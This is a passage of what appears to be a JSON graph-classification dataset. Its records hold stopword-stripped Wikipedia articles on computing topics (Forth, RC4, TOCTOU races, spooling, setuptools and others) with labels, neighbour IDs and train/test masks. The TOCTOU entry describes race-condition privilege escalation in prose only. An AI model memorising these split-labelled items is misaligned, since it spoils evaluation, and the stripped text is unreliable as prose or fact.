linked lists links proceeding latest recently defined word oldest sentinel value usually null pointer found context switch causes list search start different leaf linked list search continues branch merges main trunk leading eventually back sentinel root several dictionaries rare cases meta-compilation dictionary might isolated stand-alone effect resembles nesting namespaces overload keywords depending context defined word generally consists head body head consisting name field nf link field lf body consisting code field cf parameter field pf head body dictionary entry treated separately may contiguous example forth program recompiled new platform head may remain compiling computer body goes new platform environments embedded systems heads occupy memory unnecessarily however cross-compilers may put heads target target expected support interactive forth exact format dictionary entry prescribed implementations vary however certain components almost always present though exact size order may vary described structure dictionary entry might look way name field starts prefix giving length word name typically 32 bytes several bits flags character representation word name follows prefix depending particular implementation forth may one nul '\\0 bytes alignment link field contains pointer previously defined word pointer may relative displacement absolute address points next oldest sibling code field pointer either address word execute code data parameter field beginning machine code processor execute directly colon defined words code field pointer points word save current forth instruction pointer ip return stack load ip new address continue execution words processor call/return instructions compiler monolithic program consists forth words visible system usable programmer allows programmer change compiler words special purposes compile time flag name field set words compile time behavior simple words execute code whether typed command line embedded code compiling compiler simply places code threaded pointer word classic examples compile-time words control structures codice_12 codice_29 almost forth control structures almost compiler implemented compile-time words apart rarely used control flow words found implementations conditional return forth control flow words executed compilation compile various combinations primitive words along branch addresses instance codice_12 codice_29 words match set codice_32 unconditional branch codice_33 pop value stack branch false counted loop control flow words work similarly set combinations primitive words work counter compilation data stack used support control structure balancing nesting back-patching branch addresses snippet would compiled following sequence inside definition numbers codice_32 represent relative jump addresses codice_35 primitive word pushing literal number onto data stack word codice_20 colon parses name parameter creates dictionary entry colon definition enters compilation state interpreter continues read space-delimited words user input device word found interpreter executes compilation semantics associated word instead interpretation semantics default compilation semantics word append interpretation semantics current definition word codice_21 semi-colon finishes current definition returns interpretation state example word whose compilation semantics differ default interpretation semantics codice_21 semi-colon control flow words several words undefined ans forth meaning must used inside definitions interactive command line interpreter state changed manually words codice_39 left-bracket codice_40 right-bracket enter interpretation state compilation state respectively words used word codice_41 calculate value compilation insert calculated value current colon definition codice_41 compilation semantics take object data stack append semantics current colon definition place object data stack ans forth current state interpreter read flag codice_43 contains value true compilation state false otherwise allows implementation so-called state-smart words behavior changes according current state interpreter word codice_44 marks recent colon definition immediate word effectively replacing compilation semantics interpretation semantics immediate words normally executed compilation compiled overridden programmer either state codice_21 example immediate word ans forth word codice_46 takes name parameter appends compilation semantics named word current definition even word marked immediate forth-83 defined separate words codice_47 codice_48 force compilation non-immediate immediate words respectively ans forth unnamed words defined word codice_49 compiles following words next codice_21 semi-colon leaves execution token data stack execution token provides opaque handle compiled semantics similar function pointers c programming language execution tokens stored variables word codice_51 takes execution token data stack performs associated semantics word codice_52 compile-comma takes execution token data stack appends associated semantics current definition word codice_53 tick takes name word parameter returns execution token associated word data stack interpretation state codice_54 equivalent codice_55 words codice_20 colon codice_46 codice_53 tick examples parsing words take arguments user input device instead data stack another example word codice_59 paren reads ignores following words including next right parenthesis used place comments colon definition similarly word codice_60 backslash used comments continue end current line parsed correctly codice_59 paren codice_60 backslash must separated whitespace following comment text forth systems body code definition consists either machine language form threaded code original forth follows informal fig standard forth interest group til threaded interpretive language also called indirect-threaded code direct-threaded subroutine threaded forths also become popular modern times fastest modern forths use subroutine threading insert simple words macros perform peephole optimization optimizing strategies make code smaller faster word variable data object cf points runtime code associated defining word created defining word characteristic defining behavior creating dictionary entry plus possibly allocating initializing data space also specifies behavior instance class words constructed defining word examples include forth also provides facility programmer define new application-specific defining words specifying custom defining behavior instance behavior examples include circular buffers named bits i/o port automatically indexed arrays data objects defined similar words global scope function provided local variables languages provided data stack forth although forth also real local variables forth programming style uses named data objects compared languages typically data objects used contain data used number words tasks multitasked implementation forth enforce consistency data type usage programmer responsibility use appropriate operators fetch store values perform operations data words written forth compiled executable form classical indirect threaded implementations compile lists addresses words executed turn many modern systems generate actual machine code including calls external words code others expanded place systems optimizing compilers generally speaking forth program saved memory image compiled program single command e.g. run executed compiled version loaded development programmer uses interpreter repl mode execute test little piece developed forth programmers therefore advocate loose top-down design bottom-up development continuous testing integration top-down design usually separation program vocabularies used high-level sets tools write final program well-designed forth program reads like natural language implements single solution also sets tools attack related problems one possible implementation word codice_4 carriage return causes following output displayed new line parsing word codice_69 dot-quote reads double-quote delimited string appends code current definition parsed string displayed execution space character separating word codice_69 string codice_71 included part string needed parser recognizes codice_69 forth word standard forth system also interpreter output obtained typing following code fragment forth console codice_73 dot-paren immediate word parses parenthesis-delimited string displays word codice_69 space character separating codice_73 codice_71 part string word codice_4 comes text print convention forth interpreter start output new line also convention interpreter waits input end previous line codice_78 prompt implied flush-buffer action forth codice_4 sometimes programming languages definition word codice_80 executed emits single character codice_81 definition written use ascii value codice_81 character 81 directly text parentheses comment ignored compiler word codice_83 takes value data stack displays corresponding character following redefinition codice_80 uses words codice_39 left-bracket codice_40 right-bracket codice_87 codice_41 temporarily switch interpreter state calculate ascii value codice_81 character return compilation state append calculated value current colon definition parsing word codice_87 takes space-delimited word parameter places value first character data stack word codice_91 immediate version codice_87 using codice_91 example definition codice_80 could rewritten like definition used codice_60 backslash describing comment codice_87 codice_91 predefined ans forth using codice_44 codice_46 codice_91 could defined like 1987 ron rivest developed rc4 cipher-system rsa data security inc code extremely simple written programmers description array 256 bytes different every time array used changes swapping two bytes swaps controlled counters j initially 0 get new add 1 get new j add array byte new exchange array bytes j code array byte sum array bytes j xored byte plaintext encrypt ciphertext decrypt array initialized first setting 0 255 step using j getting new j adding array byte key byte swapping array bytes j finally j set 0 additions modulo 256 following standard forth version uses core core extension words one many ways test code forth virtual machine simple implement standard reference implementation numerous implementations language addition supporting standard varieties desktop computer systems posix microsoft windows mac os x many forth systems also target variety embedded systems listed prominent systems conform 1994 ans forth standard",
    "neighbors": [
      9345,
      5634,
      5510,
      5384,
      1673,
      1804,
      6797,
      8973,
      1552,
      6160,
      8720,
      5395,
      1685,
      3733,
      3613,
      8479,
      1184,
      1952,
      9762,
      8868,
      1702,
      2345,
      682,
      1963,
      4779,
      9643,
      7983,
      5040,
      10927,
      8628,
      6837,
      823,
      58,
      4410,
      2620,
      1087,
      7616,
      9665,
      1474,
      963,
      5059,
      8898,
      8262,
      4042,
      4684,
      3323,
      5711,
      11219,
      9172,
      3413,
      2774,
      2519,
      10456,
      7421,
      10586,
      477,
      1376,
      4069,
      4581,
      6502,
      11625,
      5354,
      1515,
      7019,
      9454,
      7281,
      9714,
      5492,
      2808,
      9210,
      2811,
      2045,
      8958
    ],
    "mask": "None"
  },
  {
    "node_id": 3905,
    "label": 8,
    "text": "PostRank:postrank postrank social media analytics service used proprietary ranking algorithm measure social engagement published content based blog comments links internet bookmarks clicks page views activities social network services twitter digg facebook myspace june 2011 postrank acquired google company formerly called aiderss inc october 2008 aiderss re-launched website postrank.com focus company work core postrank technology july 2009 company officially changed name postrank inc company developed offered multiple services acquisition postrank functionality integrated google analytics",
    "neighbors": [
      6576,
      5524
    ],
    "mask": "Test"
  },
  {
    "node_id": 3906,
    "label": 1,
    "text": "Elasticity_(data_store):elasticity data store elasticity data store relates flexibility data model clustering capabilities greater number data model changes tolerated easily clustering managed elastic data store considered clustering elasticity ease adding removing nodes distributed data store usually difficult delicate task done expert relational database system nosql data stores like apache cassandra easy solution node added/removed changes properties adding specifying least one seed relational databases often inelastic predefined data model adapted redesign nosql data stores however fixed schema row different number even different type columns concerning data store modifications schema problem makes kind data stores elastic concerning data model drawback programmer take account data model may change time",
    "neighbors": [
      5034,
      9286,
      5047
    ],
    "mask": "Test"
  },
  {
    "node_id": 3907,
    "label": 8,
    "text": "Sensor_Observation_Service:sensor observation service sensor observation service sos web service query real-time sensor data sensor data time series part sensor web offered sensor data comprises descriptions sensors encoded sensor model language sensorml measured values observations measurements encoding format web service well file formats open standards specifications name defined open geospatial consortium ogc sos supports transactional profile sos-t new sensors registered service interface measuring values inserted sos implementation used data in-situ well remote sensing sensors furthermore sensors either mobile stationary since 2007 sos official ogc standard advantage sos sensor data kind available standardized format using standardized operations thus web-based access sensor data simplified also allows easy integration existing spatial data infrastructures geographic information systems 2016 ogc approved sensorthings api standard specification new restful json-based standard provide functions similar sos sensorthings api sos based ogc/iso 19156:2011 two specifications demonstrated ogc iot pilot interoperate sos three so-called core operations must provided implementation getcapabilities operation allows query service description service interface available sensor data using sos getobservation function probably important utilized retrieve data specific sensors describesensor function returns detailed information sensor sensor system producing processes ogc sos well-defined terminology better understanding important terms sos standard ogc ultimately defines service interface implementation currently several open source implementations service also proprietary implementations exist",
    "neighbors": [
      5700,
      8582,
      8554,
      5677,
      4058,
      2045,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 3908,
    "label": 4,
    "text": "POPFile:popfile popfile free open-source cross-platform mail filter originally written perl john graham-cumming maintained team volunteers uses naive bayes classifier filter mail allows filter learn classify mail according user preferences typically used filter spam mail also used sort mail user defined buckets categories example user may define bucket work email sorted program works several different modes popular mode sets proxy email client pop3 server mail downloaded via pop3 filter identifies classifies mail makes user defined modification subject line appending name appropriate bucket user sets rules mail client sort mail based subject line modification html based interface used instruct popfile allowing users correct errors classifications thus train system sensitive user specific requirements alternative subject-line modification supplement system also configured use custom mail headers instead another possible mode popfile work imap client monitors imap server incoming mail also messages moved user incoming emails categorized immediately moved folder corresponding categorization train popfile mode user needs move message correct folder i.e folder popfile moved message",
    "neighbors": [
      8582,
      6094,
      7983,
      4272,
      4725
    ],
    "mask": "Test"
  },
  {
    "node_id": 3909,
    "label": 6,
    "text": "Comparison_of_distributed_file_systems:comparison distributed file systems computing distributed file system dfs network file system file system allows access files multiple hosts sharing via computer network makes possible multiple users multiple machines share files storage resources distributed file systems differ performance mutability content handling concurrent writes handling permanent temporary loss nodes storage policy storing content researchers made functional experimental analysis several distributed file systems including hdfs ceph gluster lustre old 1.6.x version moosefs although document 4 years old lot information may outdated e.g moosefs time writing stable 2.0 beta 3.0 version ha metadata server since 2.0 mentioned document cloud based remote distributed storage major vendors different apis different consistency models",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      5677,
      7225,
      11323,
      9277,
      8772,
      1109,
      1118,
      4708,
      9836,
      7789,
      9333,
      1142,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      6291,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      4797,
      8380,
      3265,
      7364,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      3819,
      1263,
      3312,
      3826,
      2291,
      246,
      10486,
      3834,
      3323,
      3328,
      11012,
      5384,
      1801,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      4390,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      2378,
      4431,
      5969,
      346,
      2395,
      4954,
      2397,
      7005,
      10596,
      2407,
      10087,
      8554,
      11638,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      7565,
      1935,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      6591,
      11201,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 3910,
    "label": 9,
    "text": "Lucid_(programming_language):lucid programming language lucid dataflow programming language designed experiment non-von neumann programming models designed bill wadge ed ashcroft described 1985 book lucid dataflow programming language plucid first interpreter lucid lucid uses demand-driven model data computation statement understood equation defining network processors communication lines data flows variable infinite stream values every function filter transformer iteration simulated 'current values 'fby read 'followed operator allowing composition streams lucid based algebra histories history infinite sequence data items operationally history thought record changing values variable history operations first next understood ways suggested names lucid originally conceived kind disciplined mathematically pure single-assignment language verification would much simplified however dataflow interpretation important influence direction lucid evolved lucid dataflow languages expression contains variable yet bound waits variable bound proceeding expression like codice_1 wait x bound returning output expression important consequence explicit logic updating related values avoided results substantial code reduction compared mainstream languages variable lucid stream values expression codice_2 defines stream using operator 'fby mnemonic followed fby defines comes previous expression instance stream produces 1,2,3 ... values stream addressed operators assuming x variable used codice_3 fetches first value stream x codice_4 current value stream codice_5 fetches next value stream codice_6 operator thing 'as soon condition given becomes true codice_7 upon operator repeats old value stream x updates new values stream p makes codice_8 value available serves slow stream x i.e codice_9 stream x new values appearing upon truth p. computation carried defining filters transformation functions act time-varying streams data fac fib total running_avg prime qsort eof first else follow qsort b0 qsort b1 fi -- -- -- -- whenever -- -- qsort -- -- -- -- sqroot avg square h",
    "neighbors": [
      4417,
      1826,
      9345,
      6950,
      8262,
      11625,
      655,
      1333,
      7769
    ],
    "mask": "Test"
  },
  {
    "node_id": 3911,
    "label": 3,
    "text": "List_of_Linux-supported_computer_architectures:list linux-supported computer architectures basic components linux family operating systems based linux kernel gnu c library busybox forks thereof like μclinux uclibc programmed certain level abstraction mind also distinct code paths assembly language c source code support certain hardware therefore source code successfully compiled onor cross-compiled fora great number computer architectures furthermore required free open-source software also developed interface linux hardware linux executed example compilers available e.g gnu compiler collection gcc llvm/clang cross-compilation number complete toolchains available like gnu toolchain openwrt buildroot openembedded yocto project targeted embedded use cases portability section linux kernel article contains information references technical details note components like display server programs like blender present absent fundamentally software ported i.e specifically adapted kind hardware supposed executed level abstraction kept mind programming software first place dictates necessary effort relevant term porting target computer architecture comprises instruction set microarchitecture processor least cpu target also comprises system design entire system supercomputer desktop computer soc e.g case unique bus used former times memory controller part chipset motherboard cpu-die although support specific instruction set task compiler software must written certain level abstraction mind make portability possible code written assembly language specific instruction set support specific microarchitecture includes optimizations cpu cache hierarchy tlb etc additional processors particularly freescale 68000 coldfire supported mmu-less μclinux variant",
    "neighbors": [
      1537,
      9731,
      516,
      6151,
      4616,
      3082,
      11282,
      5139,
      4124,
      3101,
      10780,
      10785,
      3618,
      6180,
      8237,
      8242,
      9266,
      4664,
      4161,
      7234,
      10817,
      8772,
      6213,
      3142,
      11333,
      2635,
      8268,
      589,
      10316,
      593,
      597,
      6244,
      5222,
      10856,
      10862,
      4207,
      9851,
      5244,
      4734,
      11391,
      7812,
      4741,
      8326,
      4743,
      7820,
      7821,
      4238,
      7311,
      10382,
      1682,
      2195,
      2711,
      6808,
      9368,
      666,
      9371,
      9882,
      1694,
      8863,
      7842,
      2723,
      6311,
      1707,
      8364,
      2224,
      10933,
      5815,
      9913,
      5822,
      5824,
      10945,
      1736,
      2762,
      9932,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      9955,
      2788,
      3300,
      2278,
      233,
      4841,
      7403,
      5356,
      8937,
      9964,
      10985,
      1776,
      8944,
      10482,
      2294,
      6391,
      8439,
      2809,
      249,
      3323,
      8700,
      7938,
      5380,
      4360,
      5384,
      1291,
      4367,
      1298,
      1813,
      792,
      8480,
      10016,
      291,
      295,
      3883,
      10548,
      823,
      6968,
      7992,
      8508,
      318,
      6981,
      3911,
      6988,
      2895,
      10063,
      11603,
      5975,
      11095,
      1377,
      11626,
      10091,
      7540,
      1399,
      8573,
      1406,
      8066,
      9090,
      900,
      5514,
      4493,
      398,
      11155,
      9621,
      1431,
      8602,
      5019,
      11678,
      1952,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      9137,
      11184,
      1972,
      1462,
      7607,
      9660,
      9665,
      9667,
      1480,
      457,
      5067,
      6607,
      8147,
      2517,
      9686,
      473,
      2524,
      477,
      2525,
      7134,
      2529,
      6625,
      8676,
      2021,
      10725,
      1513,
      1005,
      10734,
      3055,
      7151,
      5105,
      6129,
      499,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3912,
    "label": 8,
    "text": "Usage_data:usage data usage data effective way evaluating true relevancy value website example users arrive web site go back immediately high bounce rate chances ’ relevant query first place however user repeatedly visits web site spends long time site high likelihood extremely relevant comes search engines relevant valuable sites get promoted irrelevant sites get demoted search engines want results highly relevant web users make sure web users keep returning search engine future searches best way establish relevance users know use web sites cookies used search engines maintain history user ’ search activity",
    "neighbors": [
      7965,
      7047
    ],
    "mask": "Test"
  },
  {
    "node_id": 3913,
    "label": 4,
    "text": "Tape_management_system:tape management system tape management system tms computer software manages usage retention computer backup tapes may done stand-alone function part broader backup software package modern tape management system tms usually used conjunction backup applications generally used manage magnetic tape media contains backup information electronically stored information tape management systems used organizations locate track rotate media according organizations internal policies well government regulations stand-alone tape management systems predominant mainframe platforms tape used backup base load storage medium mainframe systems ibm z/os provide basic support tape inventory control via os catalog cataloging files optional usually required additional software package following operations usually achieved using operating system hooks intercept file open close operations",
    "neighbors": [
      9025,
      3366,
      1801,
      1358,
      7983,
      8687,
      2168
    ],
    "mask": "None"
  },
  {
    "node_id": 3914,
    "label": 4,
    "text": "Time-of-check_to_time-of-use:time-of-check time-of-use software development time-of-check time-of-use toctou tocttou toc/tou class software bugs caused race condition involving checking state part system security credential use results check simple example follows consider web application allows user edit pages also allows administrators lock pages prevent editing user requests edit page getting form used alter content user submits form administrator locks page prevent editing however since editing already begun user submits form edits already made accepted user began editing appropriate authorization checked user indeed allowed edit however authorization used later time edits longer allowed toctou race conditions common unix operations file system occur contexts including local sockets improper use database transactions early 1990s mail utility bsd 4.3 unix exploitable race condition temporary files used codice_1 function early versions openssh exploitable race condition unix domain sockets remain problem modern systems 2019 toctou race condition docker allows root access filesystem host platform unix following c code used codice_2 program toctou bug access intended check whether real user executed codice_2 program would normally allowed write file i.e. codice_4 checks real userid rather effective userid race condition vulnerable attack example attacker exploit race condition codice_5 codice_6 trick codice_2 victim overwriting entry system password database toctou races used privilege escalation get administrative access machine although sequence events requires precise timing possible attacker arrange conditions without much difficulty implication applications assume state managed operating system case file system namespace change system calls exploiting toctou race condition requires precise timing ensure attacker operations interleave properly victim example attacker must execute codice_8 system call precisely codice_5 codice_6 general attack attacker must scheduled execution operation victim also known single-stepping victim case bsd 4.3 mail utility mktemp attacker simply keep launching mail utility one process keep guessing temporary file names keep making symlinks another process attack usually succeed less one minute techniques single-stepping victim program include file system mazes algorithmic complexity attacks cases attacker manipulates os state control scheduling victim file system mazes force victim read directory entry os cache os puts victim sleep reading directory disk algorithmic complexity attacks force victim spend entire scheduling quantum inside single system call traversing kernel hash table cached file names attacker creates large number files names hash value file victim look despite conceptual simplicity toctou race conditions difficult avoid eliminate one general technique use exception handling instead checking philosophy eafp – easier ask forgiveness permission rather lbyl – look leap – case check failure assumptions hold detected use time exception context file system toctou race conditions fundamental challenge ensuring file system changed two system calls 2004 impossibility result published showing portable deterministic technique avoiding toctou race conditions since impossibility result libraries tracking file descriptors ensuring correctness proposed researchers alternative solution proposed research community unix systems adopt transactions file system os kernel transactions provide concurrency control abstraction os used prevent toctou races production unix kernel yet adopted transactions proof-of-concept research prototypes developed linux including valor file system txos kernel microsoft windows added transactions ntfs file system microsoft discourages use indicated may removed future version windows file locking common technique preventing race conditions single file extend file system namespace metadata locking work well networked filesystems prevent toctou race conditions setuid binaries possible solution use codice_11 system call change effective user perform codice_12 differences codice_13 operating systems problematic",
    "neighbors": [
      9762,
      6813,
      10631,
      6184,
      6797,
      2193,
      2322,
      3473,
      5492,
      7446,
      5658,
      2045,
      2910,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3915,
    "label": 3,
    "text": "Game_Over_II:game ii game ii known phantis spain action game developed published dinamic software 1987 amstrad cpc atari st commodore 64 ms-dos msx zx spectrum game ii mix scrolling shoot 'em game similar r-type platform game similar turrican four phases six levels versions game split two parts due size restrictions story begins arkon hero rebellion managed defeat evil empress gremla free galaxy oppressive rule original spanish version phantis player controls major locke tries rescue boyfriend arkon captured forces loyal vengeful unnamed heir gremla featured cover art imprisoned planet phantis english-language version titled game ii arkon job rescue commander serena game versions although originally conceived independent game title phantis became sequel game atari st version never published spain exists game ii title game promotion included appearance model dressed queen gremla trade convention pc show '88 game given generally mediocre reviews received scores 69 amstrad action 55 commodore user 60-63 games machine 62 sinclair user amstrad computer user gave 17/20",
    "neighbors": [
      680,
      9166,
      9006,
      9303
    ],
    "mask": "Train"
  },
  {
    "node_id": 3916,
    "label": 2,
    "text": "Spooling:spooling computing spooling specialized form multi-programming purpose copying data different devices contemporary systems usually used mediating computer application slow peripheral printer spooling allows programs hand work done peripheral proceed tasks begin input transcribed dedicated program spooler maintains orderly sequence jobs peripheral feeds data rate conversely slow input peripherals card reader spooler maintain sequence computational jobs waiting data starting job relevant input available see batch processing spool refers sequence jobs storage area held many cases spooler able drive devices full rated speed minimal impact processing spooling combination buffering queueing nowadays common use spooling printing documents formatted printing stored queue speed computer retrieved printed speed printer multiple processes write documents spool without waiting perform tasks spooler process operates printer example large organization prepares payroll cheques computation takes minutes even seconds printing process might take hours payroll program printed cheques directly would unable proceed computations cheques printed similarly spooling added pc operating systems word processors unable anything else including interact user printing spooler print management software often includes variety related features allowing priorities assigned print jobs notifying users documents printed distributing print jobs among several printers selecting appropriate paper document etc print server applies spooling techniques allow many computers share printer group printers print spoolers configured add banner page also called burst page job sheet printer separator front document separate documents identify document e.g title often also state printed e.g username job name banner pages valuable office environments many people share small number printers depending configuration banner pages might generated client computer centralized print server printer printers using fanfold continuous forms leading banner page would often printed twice one copy would always face-up jobs separated page might include lines printed fold would visible along edge stack printed output allowing operator easily separate jobs systems would also print banner page end job assuring users collected printout spooling also used mediate access punched card readers punches magnetic tape drives slow sequential i/o devices allows application run speed cpu operating peripheral devices full rates speed batch processing system uses spooling maintain queue ready-to-run tasks started soon system resources process store forward messaging systems uucp used spool refer inbound outbound message queues terminology still found documentation email usenet software even though messages often delivered immediately nowadays peripheral devices always much slower core processing units especially severe problem early mainframes example job read punched cards generated printed output directly forced run speed slow mechanical devices first spooling programs ibm spool system 7070-io-076 copied data punched cards magnetic tape tape back punched cards printers hard disks even faster support random access started replace use magnetic tape middle 1960s 1970s eliminated use tape unit record equipment ibm mainframes early 1960s slow common use small offline machine 1401 instead spooling term spool probably originates simultaneous peripheral operations on-line spool software derivation uncertain simultaneous peripheral operations on-line may backronym another explanation refers spools reels magnetic tape",
    "neighbors": [
      4481,
      9986,
      3974,
      9351,
      1676,
      11153,
      3350,
      6550,
      4002,
      8360,
      2345,
      4011,
      1581,
      2221,
      7983,
      1073,
      4535,
      4151,
      8631,
      10040,
      1219,
      8137,
      7626,
      340,
      9814,
      868,
      11236,
      1386,
      10730,
      8301,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 3917,
    "label": 3,
    "text": "Samantha_Fox_Strip_Poker:samantha fox strip poker samantha fox strip poker 1986 erotic video game developed software communications published martech games published commodore 64 amstrad cpc bbc micro msx zx spectrum game one first erotic video games include real human part theme erotic games players complete difficult tasks rewarded nudity video game programmed wolfgang smith graphics edited malcolm smith author music rob hubbard credited name john york music includes cover entertainer scott joplin stripper david rose players plays 5-card 7-card stud poker british model singer samantha fox beating results taking clothes topless zzap felt music well-suited style game commodore format magazine thought idea anybody using game way experience titillating content depressing due require effort player uvejuegos thought game prime example strange 1980s spiegel placed game within sub-genre early pixelated digi-ladies dubious beauty along artworx strip poker 1984",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3918,
    "label": 2,
    "text": "Setuptools:setuptools setuptools package development process library designed facilitate packaging python projects enhancing python standard library distutils distribution utilities includes 2013 distribute fork setuptools merged back setuptools 0.7 python wheels replaced eggs python eggs way bundling additional information python project allows project dependencies checked satisfied runtime well allowing projects provide plugins projects python pip replaced easyinstall easyinstall package manager python provides standard format distributing python programs libraries based python eggs format easyinstall module bundled setuptools analogous rubygems ruby easyinstall fully fledged package manager list local packages update pip python package manager pypm python applications designed fulfill similar role easyinstall distribute fork created specifically due lack progress easyinstall development default easyinstall looks python package index pypi desired packages uses metadata download install package dependencies",
    "neighbors": [
      8068,
      11525,
      3462,
      8582,
      10760,
      2955,
      7435,
      6797,
      7947,
      9487,
      788,
      1813,
      5397,
      8213,
      6680,
      10900,
      10394,
      8476,
      9245,
      5155,
      5670,
      4775,
      7722,
      6828,
      5677,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      5819,
      10172,
      190,
      9151,
      10817,
      8644,
      9671,
      5578,
      5067,
      3918,
      463,
      4302,
      5070,
      2259,
      3667,
      6227,
      11221,
      4951,
      6361,
      2010,
      9564,
      8413,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      2281,
      6119,
      8554,
      5612,
      9063,
      9324,
      10096,
      1138,
      1522,
      2804,
      3573,
      2168,
      6393,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 3919,
    "label": 3,
    "text": "UltraSPARC_II:ultrasparc ii ultrasparc ii code-named blackbird microprocessor implementation sparc v9 instruction set architecture isa developed sun microsystems marc tremblay chief architect introduced 1997 development ultrasparc operating higher clock frequencies 250 mhz eventually reaching 650 mhz die contained 5.4 million transistors area 149 mm² fabricated texas instruments 0.35 µm process dissipated 25 w 205 mhz used 2.5 v power supply l2 cache capacity 1 4 mb 1999 ultrasparc ii ported 0.25 µm process version code-named sapphire-black operated 360 480 mhz possessed die area 126 mm² dissipated 21 w 400 mhz power supply voltage reduced 1.9 v. supported l2 cache capacity increased 1 8 mb ultrasparc ii basis four derivatives ultrasparc iie hummingbird embedded version introduced 2000 operated 400 500 mhz fabricated 0.18 µm process aluminium interconnects dissipated maximum 13 w 500 mhz used 1.5 1.7 v power supply 256 kb l2 cache ultrasparc iii sabre featuring on-chip pci controller low-cost version introduced 1997 operated 270 360 mhz fabricated 0.35 µm process possessed die size 156 mm² dissipated 21 w used 1.9 v power supply 256 kb 2 mb l2 cache 1998 version code-named sapphire-red fabricated 0.25 µm process enabling microprocessor operate 333 480 mhz dissipated 21 w 440 mhz used 1.9 v power supply ultrasparc iie+ iii introduced 2002 code-named phantom operated 550 650 mhz fabricated 0.18 µm process copper interconnect dissipated 17.6 w used 1.7 v power supply 512 kb l2 cache gemini first attempt sun produce multithreaded microprocessor taped cancelled introduced announcement ultrasparc t1 niagara microprocessor early 2004 consisted two ultrasparc ii cores on-die l2 cache single chip dac 2004 abstracts described dual-core ultrasparc ii processor session 40 dual-core ultrasparc 2003 based upon ultrasparc ii microarchitecture featured ddr-1 memory controller jbus interface parity protected l1 cache ecc protected dual 512kb on-chip level 2 cache 1.2 ghz clock frequency 80 million transistors 206mm^2 die size dissipated 23 watts power",
    "neighbors": [
      9090,
      9731,
      1801,
      4235,
      1809,
      4241,
      1818,
      8863,
      7072,
      1707,
      2731,
      10926,
      3247,
      6322,
      2871,
      4664,
      4285,
      6464,
      7104,
      9665,
      8007,
      2895,
      597,
      10837,
      2269,
      9955,
      7270,
      11626,
      5358,
      1776,
      5233,
      11636,
      1399,
      1788
    ],
    "mask": "None"
  },
  {
    "node_id": 3920,
    "label": 9,
    "text": "Java_servlet:java servlet java servlet java software component extends capabilities server although servlets respond many types requests commonly implement web containers hosting web applications web servers thus qualify server-side servlet web api web servlets java counterpart dynamic web content technologies php asp.net java servlet processes stores java class java ee conforms java servlet api standard implementing java classes respond requests servlets could principle communicate client–server protocol often used http thus servlet often used shorthand http servlet thus software developer may use servlet add dynamic content web server using java platform generated content commonly html may data xml commonly json servlets maintain state session variables across many server transactions using http cookies url mapping java servlet api extent superseded two standard java technologies web services deploy run servlet web container must used web container also known servlet container essentially component web server interacts servlets web container responsible managing lifecycle servlets mapping url particular servlet ensuring url requester correct access rights servlet api contained java package hierarchy defines expected interactions web container servlet object receives request generates response based request basic servlet package defines java objects represent servlet requests responses well objects reflect servlet configuration parameters execution environment package defines http-specific subclasses generic servlet elements including session management objects track multiple requests responses web server client servlets may packaged war file web application servlets generated automatically javaserver pages jsp javaserver pages compiler difference servlets jsp servlets typically embed html inside java code jsps embed java code html direct usage servlets generate html shown example become rare higher level mvc web framework java ee jsf still explicitly uses servlet technology low level request/response handling via somewhat older usage use servlets conjunction jsps pattern called model 2 flavor model–view–controller current version servlet 4.0 java servlets api first publicly announced inaugural javaone conference may 1996 two months announcements conference first public implementation made available javasoft website first alpha java web server jws known codename jeeves would eventually shipped product june 5 1997 blog java.net sun veteran glassfish lead jim driscoll details history servlet technology james gosling first thought servlets early days java concept become product december 1996 sun shipped jws java platform enterprise edition made specification servlet1 specification created pavni diwanji worked sun microsystems version 1.0 finalized june 1997 starting version 2.2 specification developed java community process three methods central life cycle servlet codice_1 codice_2 codice_3 implemented every servlet invoked specific times server following typical user scenario methods following example servlet prints many times codice_2 method called note codice_16 subclass codice_17 implementation codice_18 interface codice_2 method codice_16 class dispatches requests methods codice_21 codice_22 codice_23 codice_24 according http request example codice_2 overridden distinguish http request method serves import java.io.ioexception import javax.servlet.servletconfig import javax.servlet.servletexception import javax.servlet.http.httpservlet import javax.servlet.http.httpservletrequest import javax.servlet.http.httpservletresponse public class servletlifecycleexample extends httpservlet specification servlet technology implemented many products see list implementations web container page",
    "neighbors": [
      7176,
      9229,
      1556,
      7212,
      5677,
      10284,
      4658,
      2106,
      572,
      64,
      7750,
      1095,
      1128,
      7784,
      9834,
      9841,
      8825,
      3705,
      124,
      3712,
      2222,
      4797,
      6334,
      11466,
      6860,
      3278,
      5849,
      6366,
      225,
      1250,
      5872,
      10486,
      9988,
      4358,
      1802,
      10506,
      3341,
      7965,
      10526,
      10020,
      3877,
      10026,
      9011,
      7485,
      11582,
      1363,
      4959,
      4960,
      865,
      5987,
      3954,
      9078,
      3966,
      910,
      11154,
      4507,
      5031,
      6067,
      2485,
      6074,
      10683,
      1468,
      3517,
      3518,
      3519,
      3008,
      5567,
      9665,
      10684,
      8644,
      10193,
      5593,
      479,
      3558,
      3560,
      3561,
      3562,
      7146,
      8689,
      9726,
